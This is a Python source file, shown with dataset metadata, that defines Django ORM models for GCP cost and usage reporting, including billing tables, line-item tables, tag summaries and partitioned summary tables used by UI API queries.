| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b71001480f941cb198b817d674f01171403b0eda
| 33,288
|
py
|
Python
|
koku/reporting/provider/gcp/models.py
|
bsquizz/koku
|
386dd6ca4a4fd1b50790a929acc81d2dc245a91c
|
[
"Apache-2.0"
] | null | null | null |
koku/reporting/provider/gcp/models.py
|
bsquizz/koku
|
386dd6ca4a4fd1b50790a929acc81d2dc245a91c
|
[
"Apache-2.0"
] | null | null | null |
koku/reporting/provider/gcp/models.py
|
bsquizz/koku
|
386dd6ca4a4fd1b50790a929acc81d2dc245a91c
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Models for GCP cost and usage entry tables."""
from uuid import uuid4
from django.contrib.postgres.fields import ArrayField
from django.contrib.postgres.indexes import GinIndex
from django.db import models
from django.db.models import JSONField
# Presto/Trino-side table names for the raw GCP line items.
PRESTO_LINE_ITEM_DAILY_TABLE = "gcp_line_items_daily"
PRESTO_LINE_ITEM_TABLE = "gcp_line_items"
# Partitioned summary tables backing the UI API queries (the *P models below).
UI_SUMMARY_TABLES = (
    "reporting_gcp_cost_summary_p",
    "reporting_gcp_cost_summary_by_account_p",
    "reporting_gcp_cost_summary_by_project_p",
    "reporting_gcp_cost_summary_by_region_p",
    "reporting_gcp_cost_summary_by_service_p",
    "reporting_gcp_compute_summary_p",
    "reporting_gcp_compute_summary_by_account_p",
    "reporting_gcp_storage_summary_p",
    "reporting_gcp_storage_summary_by_project_p",
    "reporting_gcp_storage_summary_by_service_p",
    "reporting_gcp_storage_summary_by_account_p",
    "reporting_gcp_storage_summary_by_region_p",
    "reporting_gcp_network_summary_p",
    "reporting_gcp_database_summary_p",
)
class GCPCostEntryBill(models.Model):
    """The billing information for a Cost Usage Report.

    The billing period (1 month) will cover many cost entries.
    """

    class Meta:
        """Meta for GCPCostEntryBill."""

        unique_together = ("billing_period_start", "provider")

    billing_period_start = models.DateTimeField()
    billing_period_end = models.DateTimeField()
    # bookkeeping timestamps for the summary/derived-cost pipeline
    summary_data_creation_datetime = models.DateTimeField(null=True, blank=True)
    summary_data_updated_datetime = models.DateTimeField(null=True, blank=True)
    finalized_datetime = models.DateTimeField(null=True, blank=True)
    derived_cost_datetime = models.DateTimeField(null=True, blank=True)
    provider = models.ForeignKey("api.Provider", on_delete=models.CASCADE)
class GCPProject(models.Model):
    """The per Project information for GCP."""

    account_id = models.CharField(max_length=20)
    project_id = models.CharField(unique=True, max_length=256)
    project_name = models.CharField(max_length=256)
    project_labels = models.CharField(max_length=256, null=True, blank=True)
class GCPCostEntryProductService(models.Model):
    """The product service and sku information."""

    class Meta:
        """Meta for GCPCostEntryProductService."""

        unique_together = ("service_id", "service_alias", "sku_id", "sku_alias")
        db_table = "reporting_gcpcostentryproductservice"

    id = models.BigAutoField(primary_key=True)
    service_id = models.CharField(max_length=256, null=True)
    service_alias = models.CharField(max_length=256, null=True, blank=True)
    sku_id = models.CharField(max_length=256, null=True)
    sku_alias = models.CharField(max_length=256, null=True)
class GCPCostEntryLineItem(models.Model):
    """GCP cost entry daily line item."""

    class Meta:
        """Meta for GCPCostEntryLineItem."""

        db_table = "reporting_gcpcostentrylineitem"

    id = models.BigAutoField(primary_key=True)
    usage_start = models.DateTimeField()
    usage_end = models.DateTimeField()
    partition_date = models.DateTimeField(null=True)
    tags = JSONField(null=True)
    usage_type = models.CharField(max_length=50, null=True)
    location = models.CharField(max_length=256, null=True, blank=True)
    country = models.CharField(max_length=256, null=True, blank=True)
    region = models.CharField(max_length=256, null=True, blank=True)
    zone = models.CharField(max_length=256, null=True, blank=True)
    export_time = models.CharField(max_length=256, null=True, blank=True)
    cost = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
    currency = models.CharField(max_length=256, null=True, blank=True)
    conversion_rate = models.CharField(max_length=256, null=True, blank=True)
    usage_to_pricing_units = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    usage_pricing_unit = models.CharField(max_length=256, null=True, blank=True)
    credits = models.CharField(max_length=256, null=True, blank=True)
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    cost_type = models.CharField(max_length=256, null=True, blank=True)
    line_item_type = models.CharField(max_length=256, null=True)
    # db_constraint=False: FK enforced at the ORM level only, no DB constraint
    cost_entry_product = models.ForeignKey(
        GCPCostEntryProductService, null=True, on_delete=models.CASCADE, db_constraint=False
    )
    cost_entry_bill = models.ForeignKey(GCPCostEntryBill, on_delete=models.CASCADE, db_constraint=False)
    project = models.ForeignKey(GCPProject, on_delete=models.CASCADE, db_constraint=False)
class GCPCostEntryLineItemDaily(models.Model):
    """GCP cost entry daily line item."""

    class Meta:
        """Meta for GCPCostEntryLineItemDaily."""

        db_table = "reporting_gcpcostentrylineitem_daily"
        indexes = [
            models.Index(fields=["usage_start"], name="gcp_usage_start_idx"),
            GinIndex(fields=["tags"], name="gcp_cost_entry"),
        ]

    id = models.BigAutoField(primary_key=True)
    cost_entry_bill = models.ForeignKey(GCPCostEntryBill, on_delete=models.CASCADE)
    cost_entry_product = models.ForeignKey(GCPCostEntryProductService, null=True, on_delete=models.CASCADE)
    project = models.ForeignKey(GCPProject, on_delete=models.CASCADE)
    line_item_type = models.CharField(max_length=256, null=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=True)
    tags = JSONField(null=True)
    usage_type = models.CharField(max_length=50, null=True)
    region = models.CharField(max_length=256, null=True, blank=True)
    cost = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
    currency = models.CharField(max_length=256, null=True, blank=True)
    conversion_rate = models.CharField(max_length=256, null=True, blank=True)
    usage_in_pricing_units = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    usage_pricing_unit = models.CharField(max_length=256, null=True, blank=True)
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    tax_type = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPCostEntryLineItemDailySummary(models.Model):
    """A daily aggregation of line items.

    This table is aggregated by service, and does not
    have a breakdown by resource or tags. The contents of this table
    should be considered ephemeral. It will be regularly deleted from
    and repopulated.
    """

    # range-partitioned on usage_start (consumed by the partitioning machinery
    # — presumably project tooling reads this; verify against the migrations)
    class PartitionInfo:
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPCostEntryLineItemDailySummary."""

        db_table = "reporting_gcpcostentrylineitem_daily_summary"
        indexes = [
            models.Index(fields=["usage_start"], name="gcp_summary_usage_start_idx"),
            models.Index(fields=["instance_type"], name="gcp_summary_instance_type_idx"),
            GinIndex(fields=["tags"], name="gcp_tags_idx"),
            models.Index(fields=["project_id"], name="gcp_summary_project_id_idx"),
            models.Index(fields=["project_name"], name="gcp_summary_project_name_idx"),
            models.Index(fields=["service_id"], name="gcp_summary_service_id_idx"),
            models.Index(fields=["service_alias"], name="gcp_summary_service_alias_idx"),
        ]

    uuid = models.UUIDField(primary_key=True)
    cost_entry_bill = models.ForeignKey(GCPCostEntryBill, on_delete=models.CASCADE)
    # The following fields are used for grouping
    account_id = models.CharField(max_length=20)
    project_id = models.CharField(max_length=256)
    project_name = models.CharField(max_length=256)
    service_id = models.CharField(max_length=256, null=True)
    service_alias = models.CharField(max_length=256, null=True, blank=True)
    sku_id = models.CharField(max_length=256, null=True)
    sku_alias = models.CharField(max_length=256, null=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=True)
    region = models.CharField(max_length=50, null=True)
    instance_type = models.CharField(max_length=50, null=True)
    unit = models.CharField(max_length=63, null=True)
    line_item_type = models.CharField(max_length=256, null=True)
    usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    # The following fields are aggregates
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    tags = JSONField(null=True)
    source_uuid = models.UUIDField(unique=False, null=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPEnabledTagKeys(models.Model):
    """A collection of the current enabled tag keys."""

    class Meta:
        """Meta for GCPEnabledTagKeys."""

        db_table = "reporting_gcpenabledtagkeys"

    id = models.BigAutoField(primary_key=True)
    key = models.CharField(max_length=253, unique=True)
class GCPTagsSummary(models.Model):
    """A collection of all current existing tag key and values."""

    class Meta:
        """Meta for GCPTagsSummary."""

        db_table = "reporting_gcptags_summary"
        unique_together = ("key", "cost_entry_bill", "account_id", "project_id", "project_name")

    uuid = models.UUIDField(primary_key=True, default=uuid4)
    key = models.TextField()
    # all values seen for this key within the (bill, account, project) scope
    values = ArrayField(models.TextField())
    cost_entry_bill = models.ForeignKey("GCPCostEntryBill", on_delete=models.CASCADE)
    account_id = models.TextField(null=True)
    project_id = models.TextField(null=True)
    project_name = models.TextField(null=True)
class GCPTagsValues(models.Model):
    """A tag key/value pair and the accounts/projects it appears in."""

    class Meta:
        """Meta for GCPTagsValues."""

        db_table = "reporting_gcptags_values"
        unique_together = ("key", "value")
        indexes = [models.Index(fields=["key"], name="gcp_tags_value_key_idx")]

    uuid = models.UUIDField(primary_key=True, default=uuid4)
    key = models.TextField()
    value = models.TextField()
    account_ids = ArrayField(models.TextField())
    project_ids = ArrayField(models.TextField(), null=True)
    project_names = ArrayField(models.TextField(), null=True)
class GCPTopology(models.Model):
    """GCPAccountTopology ORM model."""

    class Meta:
        """Meta for GCPTopology."""

        db_table = "reporting_gcp_topology"

    uuid = models.UUIDField(primary_key=True, default=uuid4)
    source_uuid = models.UUIDField(unique=False, null=True)
    account_id = models.TextField()
    project_id = models.TextField()
    project_name = models.TextField()
    service_id = models.TextField()
    service_alias = models.TextField()
    region = models.TextField()
# ======================================================
# Partitioned Models to replace matviews
# ======================================================
class GCPCostSummaryP(models.Model):
    """A summarized partitioned table specifically for UI API queries.

    This table gives a daily breakdown of total cost.
    """

    class PartitionInfo:
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPCostSummaryP."""

        db_table = "reporting_gcp_cost_summary_p"
        indexes = [
            models.Index(fields=["usage_start"], name="gcpcostsumm_usage_start"),
            models.Index(fields=["invoice_month"], name="gcpcostsumm_invmonth"),
        ]

    id = models.UUIDField(primary_key=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=False)
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    source_uuid = models.ForeignKey(
        "api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
    )
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPCostSummaryByAccountP(models.Model):
    """A summarized partitioned table specifically for UI API queries.

    This table gives a daily breakdown of total cost by account.
    """

    class PartitionInfo:
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPCostSummaryByAccountP."""

        db_table = "reporting_gcp_cost_summary_by_account_p"
        indexes = [
            models.Index(fields=["usage_start"], name="gcpcostsumm_acc_usage_start"),
            models.Index(fields=["account_id"], name="gcpcostsumm_acc_account_id"),
            models.Index(fields=["invoice_month"], name="gcpcostsumm_acc_invmonth"),
        ]

    id = models.UUIDField(primary_key=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=False)
    account_id = models.CharField(max_length=50, null=False)
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    source_uuid = models.ForeignKey(
        "api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
    )
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPCostSummaryByProjectP(models.Model):
    """A summarized partitioned table specifically for UI API queries.

    This table gives a daily breakdown of total cost by project.
    """

    class PartitionInfo:
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPCostSummaryByProjectP."""

        db_table = "reporting_gcp_cost_summary_by_project_p"
        indexes = [
            models.Index(fields=["usage_start"], name="gcpcostsumm_pro_usage_start"),
            models.Index(fields=["project_id"], name="gcpcostsumm_pro_project_id"),
            models.Index(fields=["invoice_month"], name="gcpcostsumm_pro_invmonth"),
        ]

    id = models.UUIDField(primary_key=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=False)
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    source_uuid = models.ForeignKey(
        "api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
    )
    project_id = models.CharField(unique=False, max_length=256)
    project_name = models.CharField(max_length=256)
    account_id = models.CharField(max_length=50, null=False)
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPCostSummaryByRegionP(models.Model):
    """A summarized partitioned table specifically for UI API queries.

    This table gives a daily breakdown of total cost by region.
    """

    class PartitionInfo:
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPCostSummaryByRegionP."""

        db_table = "reporting_gcp_cost_summary_by_region_p"
        indexes = [
            models.Index(fields=["usage_start"], name="gcpcostsumm_reg_usage_start"),
            models.Index(fields=["region"], name="gcpcostsumm_reg_region"),
            models.Index(fields=["invoice_month"], name="gcpcostsumm_reg_invmonth"),
        ]

    id = models.UUIDField(primary_key=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=False)
    account_id = models.CharField(max_length=50, null=False)
    region = models.CharField(max_length=50, null=True)
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    source_uuid = models.ForeignKey(
        "api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
    )
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPCostSummaryByServiceP(models.Model):
    """A summarized partitioned table specifically for UI API queries.

    This table gives a daily breakdown of total cost by service.
    """

    class PartitionInfo:
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPCostSummaryByServiceP."""

        db_table = "reporting_gcp_cost_summary_by_service_p"
        indexes = [
            models.Index(fields=["usage_start"], name="gcpcostsumm_ser_usage_start"),
            models.Index(fields=["service_id"], name="gcpcostsumm_ser_service_id"),
            models.Index(fields=["invoice_month"], name="gcpcostsumm_ser_invmonth"),
        ]

    id = models.UUIDField(primary_key=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=False)
    account_id = models.CharField(max_length=50, null=False)
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    source_uuid = models.ForeignKey(
        "api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
    )
    service_id = models.CharField(max_length=256, null=True)
    service_alias = models.CharField(max_length=256, null=True, blank=True)
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPComputeSummaryP(models.Model):
    """A summarized partitioned table specifically for UI API queries.

    This table gives a daily breakdown of compute usage.
    """

    class PartitionInfo:
        # Table is range-partitioned on the usage_start date.
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPComputeSummaryP."""

        db_table = "reporting_gcp_compute_summary_p"
        indexes = [
            models.Index(fields=["usage_start"], name="gcpcompsumm_usage_start"),
            models.Index(fields=["instance_type"], name="gcpcompsumm_insttyp"),
            models.Index(fields=["invoice_month"], name="gcpcompsumm_invmonth"),
        ]

    id = models.UUIDField(primary_key=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=False)
    instance_type = models.CharField(max_length=50, null=True)
    # Usage quantity expressed in the unit stored alongside it.
    usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    unit = models.CharField(max_length=63, null=True)
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    # Link back to the originating provider; stored in the plain
    # "source_uuid" column rather than the default "source_uuid_id".
    source_uuid = models.ForeignKey(
        "api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
    )
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPComputeSummaryByAccountP(models.Model):
    """A summarized partitioned table specifically for UI API queries.

    This table gives a daily breakdown of compute usage by account.
    """

    # NOTE(review): the original docstring said "total cost by service and
    # instance type" — a copy-paste from a sibling model. The name, table
    # name, and account_id index show this summary is keyed by account.

    class PartitionInfo:
        # Table is range-partitioned on the usage_start date.
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPComputeSummaryByAccountP."""

        db_table = "reporting_gcp_compute_summary_by_account_p"
        indexes = [
            models.Index(fields=["account_id"], name="gcpcompsumm_acc_account_id"),
            models.Index(fields=["usage_start"], name="gcpcompsumm_acc_usage_start"),
            models.Index(fields=["instance_type"], name="gcpcompsumm_acc_insttyp"),
            models.Index(fields=["invoice_month"], name="gcpcompsumm_acc_invmonth"),
        ]

    id = models.UUIDField(primary_key=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=False)
    instance_type = models.CharField(max_length=50, null=True)
    usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    unit = models.CharField(max_length=63, null=True)
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    # Link back to the originating provider; stored in the plain
    # "source_uuid" column rather than the default "source_uuid_id".
    source_uuid = models.ForeignKey(
        "api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
    )
    account_id = models.CharField(max_length=50, null=False)
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPStorageSummaryP(models.Model):
    """A summarized partitioned table specifically for UI API queries.

    This table gives a daily breakdown of storage usage.
    """

    class PartitionInfo:
        # Table is range-partitioned on the usage_start date.
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPStorageSummaryP."""

        db_table = "reporting_gcp_storage_summary_p"
        indexes = [
            models.Index(fields=["usage_start"], name="gcpstorsumm_usage_start"),
            models.Index(fields=["invoice_month"], name="gcpstorsumm_invmonth"),
        ]

    id = models.UUIDField(primary_key=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=False)
    usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    unit = models.CharField(max_length=63, null=True)
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    # Link back to the originating provider; stored in the plain
    # "source_uuid" column rather than the default "source_uuid_id".
    source_uuid = models.ForeignKey(
        "api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
    )
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPStorageSummaryByProjectP(models.Model):
    """A summarized partitioned table specifically for UI API queries.

    This table gives a daily breakdown of storage usage by project.
    """

    # NOTE(review): the original docstring said "total cost by account" —
    # a copy-paste error; the name, table name, and project_id fields show
    # this summary is keyed by project.

    class PartitionInfo:
        # Table is range-partitioned on the usage_start date.
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPStorageSummaryByProjectP."""

        db_table = "reporting_gcp_storage_summary_by_project_p"
        indexes = [
            models.Index(fields=["usage_start"], name="gcpstorsumm_pro_usage_start"),
            models.Index(fields=["project_id"], name="gcpstorsumm_pro_project_id"),
            models.Index(fields=["account_id"], name="gcpstorsumm_pro_account_id"),
            models.Index(fields=["invoice_month"], name="gcpstorsumm_pro_invmonth"),
        ]

    id = models.UUIDField(primary_key=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=False)
    usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    unit = models.CharField(max_length=63, null=True)
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    # Link back to the originating provider; stored in the plain
    # "source_uuid" column rather than the default "source_uuid_id".
    source_uuid = models.ForeignKey(
        "api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
    )
    project_id = models.CharField(unique=False, max_length=256)
    project_name = models.CharField(max_length=256)
    account_id = models.CharField(max_length=50, null=False)
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPStorageSummaryByServiceP(models.Model):
    """A summarized partitioned table specifically for UI API queries.

    This table gives a daily breakdown of storage usage by service.
    """

    # NOTE(review): the original docstring said "compute usage by service
    # and instance type" — a copy-paste error; the name and table name show
    # this is a storage summary keyed by service.

    class PartitionInfo:
        # Table is range-partitioned on the usage_start date.
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPStorageSummaryByServiceP."""

        db_table = "reporting_gcp_storage_summary_by_service_p"
        indexes = [
            models.Index(fields=["usage_start"], name="gcpstorsumm_ser_usage_start"),
            models.Index(fields=["service_id"], name="gcpstorsumm_ser_service_id"),
            models.Index(fields=["account_id"], name="gcpstorsumm_ser_account_id"),
            models.Index(fields=["invoice_month"], name="gcpstorsumm_ser_invmonth"),
        ]

    id = models.UUIDField(primary_key=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=False)
    usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    unit = models.CharField(max_length=63, null=True)
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    # Link back to the originating provider; stored in the plain
    # "source_uuid" column rather than the default "source_uuid_id".
    source_uuid = models.ForeignKey(
        "api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
    )
    # GCP service identifier plus its human-readable alias.
    service_id = models.CharField(max_length=256, null=True)
    service_alias = models.CharField(max_length=256, null=True, blank=True)
    account_id = models.CharField(max_length=50, null=False)
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPStorageSummaryByAccountP(models.Model):
    """A summarized partitioned table specifically for UI API queries.

    This table gives a daily breakdown of storage usage by account.
    """

    # NOTE(review): the original docstring said "total cost by service and
    # instance type" — a copy-paste error; the name, table name, and
    # account_id index show this is a storage summary keyed by account.

    class PartitionInfo:
        # Table is range-partitioned on the usage_start date.
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPStorageSummaryByAccountP."""

        db_table = "reporting_gcp_storage_summary_by_account_p"
        indexes = [
            models.Index(fields=["usage_start"], name="gcpstorsumm_acc_usage_start"),
            models.Index(fields=["account_id"], name="gcpstorsumm_acc_account_id"),
            models.Index(fields=["invoice_month"], name="gcpstorsumm_acc_invmonth"),
        ]

    id = models.UUIDField(primary_key=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=False)
    usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    unit = models.CharField(max_length=63, null=True)
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    # Link back to the originating provider; stored in the plain
    # "source_uuid" column rather than the default "source_uuid_id".
    source_uuid = models.ForeignKey(
        "api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
    )
    account_id = models.CharField(max_length=50, null=False)
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPStorageSummaryByRegionP(models.Model):
    """A summarized partitioned table specifically for UI API queries.

    This table gives a daily breakdown of storage usage by region.
    """

    # NOTE(review): the original docstring said "total cost by service and
    # instance type" — a copy-paste error; the name, table name, and region
    # field show this is a storage summary keyed by region.

    class PartitionInfo:
        # Table is range-partitioned on the usage_start date.
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPStorageSummaryByRegionP."""

        db_table = "reporting_gcp_storage_summary_by_region_p"
        indexes = [
            models.Index(fields=["usage_start"], name="gcpstorsumm_reg_usage_start"),
            models.Index(fields=["account_id"], name="gcpstorsumm_reg_account_id"),
            models.Index(fields=["invoice_month"], name="gcpstorsumm_reg_invmonth"),
        ]

    id = models.UUIDField(primary_key=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=False)
    usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    unit = models.CharField(max_length=63, null=True)
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    # Link back to the originating provider; stored in the plain
    # "source_uuid" column rather than the default "source_uuid_id".
    source_uuid = models.ForeignKey(
        "api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
    )
    account_id = models.CharField(max_length=50, null=False)
    region = models.CharField(max_length=50, null=True)
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPNetworkSummaryP(models.Model):
    """A summarized partitioned table specifically for UI API queries.

    This table gives a daily breakdown of network usage.
    """

    # NOTE(review): the original docstring called this "A MATERIALIZED
    # VIEW", but the PartitionInfo declaration and "_p" table-name suffix
    # match the partitioned-table pattern used by the sibling models.

    class PartitionInfo:
        # Table is range-partitioned on the usage_start date.
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPNetworkSummaryP."""

        db_table = "reporting_gcp_network_summary_p"
        indexes = [
            models.Index(fields=["usage_start"], name="gcpnetsumm_usage_start"),
            models.Index(fields=["invoice_month"], name="gcpnetsumm_invmonth"),
        ]

    id = models.UUIDField(primary_key=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=False)
    account_id = models.CharField(max_length=50, null=False)
    usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    unit = models.CharField(max_length=63, null=True)
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    # Link back to the originating provider; stored in the plain
    # "source_uuid" column rather than the default "source_uuid_id".
    source_uuid = models.ForeignKey(
        "api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
    )
    # GCP service identifier plus its human-readable alias.
    service_id = models.CharField(max_length=256, null=True)
    service_alias = models.CharField(max_length=256, null=True, blank=True)
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPDatabaseSummaryP(models.Model):
    """A summarized partitioned table specifically for UI API queries.

    This table gives a daily breakdown of database usage.
    """

    # NOTE(review): the original docstring called this "A MATERIALIZED
    # VIEW", but the PartitionInfo declaration and "_p" table-name suffix
    # match the partitioned-table pattern used by the sibling models.

    class PartitionInfo:
        # Table is range-partitioned on the usage_start date.
        partition_type = "RANGE"
        partition_cols = ["usage_start"]

    class Meta:
        """Meta for GCPDatabaseSummaryP."""

        db_table = "reporting_gcp_database_summary_p"
        indexes = [
            models.Index(fields=["usage_start"], name="gcpdbsumm_usage_start"),
            models.Index(fields=["invoice_month"], name="gcpdbsumm_invmonth"),
        ]

    id = models.UUIDField(primary_key=True)
    usage_start = models.DateField(null=False)
    usage_end = models.DateField(null=False)
    account_id = models.CharField(max_length=50, null=False)
    usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    unit = models.CharField(max_length=63, null=True)
    unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
    currency = models.CharField(max_length=10)
    # Link back to the originating provider; stored in the plain
    # "source_uuid" column rather than the default "source_uuid_id".
    source_uuid = models.ForeignKey(
        "api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
    )
    # GCP service identifier plus its human-readable alias.
    service_id = models.CharField(max_length=256, null=True)
    service_alias = models.CharField(max_length=256, null=True, blank=True)
    invoice_month = models.CharField(max_length=256, null=True, blank=True)
    credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
| 34.74739
| 107
| 0.714402
| 4,149
| 33,288
| 5.499879
